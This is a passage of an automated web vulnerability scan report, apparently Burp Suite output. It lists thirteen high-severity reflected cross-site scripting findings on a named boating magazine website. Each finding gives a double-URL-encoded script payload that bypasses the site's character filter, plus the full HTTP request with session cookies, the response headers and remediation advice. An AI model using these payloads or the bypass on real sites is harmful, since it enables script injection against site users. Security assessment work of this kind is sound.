There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /features/lifestyle?3fd13%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f2d84a438=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:45 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.892. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/profiles
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d4ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efe6bf0d5746 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d4ab"><script>alert(1)</script>fe6bf0d5746 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /features/profiles?9d4ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efe6bf0d5746=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:44 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.893. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/technical
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdb26%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67cb149e626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cdb26"><script>alert(1)</script>67cb149e626 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /features/technical?cdb26%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67cb149e626=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.894. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/type-of-boat
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b840b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20e32f818ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b840b"><script>alert(1)</script>20e32f818ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /features/type-of-boat?b840b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20e32f818ce=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:45 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.895. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbe605dcccb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4c7f"><script>alert(1)</script>cbe605dcccb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111&a4c7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbe605dcccb=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.896. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/more/digital-publications
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed44198a6732 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cbb5b"><script>alert(1)</script>d44198a6732 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /more/digital-publications?cbb5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed44198a6732=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.897. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/more/the-masters-series
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2be4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52ad10d94f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2be4f"><script>alert(1)</script>52ad10d94f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /more/the-masters-series?2be4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52ad10d94f9=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:01 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.898. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e720e96da4e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b74"><script>alert(1)</script>720e96da4e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news?47b74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e720e96da4e2=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:52 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.899. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/coastwise
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51b8e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5c8ce41216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51b8e"><script>alert(1)</script>c5c8ce41216 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/coastwise?51b8e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5c8ce41216=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:16 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.900. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/dispatches
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aa18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ffa1ffcd40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2aa18"><script>alert(1)</script>5ffa1ffcd40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/dispatches?2aa18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ffa1ffcd40=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.901. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/home-waters
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ee0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19a87dc7b6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1ee0"><script>alert(1)</script>19a87dc7b6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/home-waters?c1ee0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19a87dc7b6e=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.902. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/mishaps-a-rescues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc446%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74fbf294bd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc446"><script>alert(1)</script>74fbf294bd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/mishaps-a-rescues?fc446%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74fbf294bd7=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:17 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.903. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/mishaps-a-rescues/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 575f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6b2abc3a30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 575f4"><script>alert(1)</script>c6b2abc3a30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/mishaps-a-rescues/index.php?575f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6b2abc3a30=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:13 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.904. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/sailing
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24feb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96ffec7c22a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24feb"><script>alert(1)</script>96ffec7c22a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
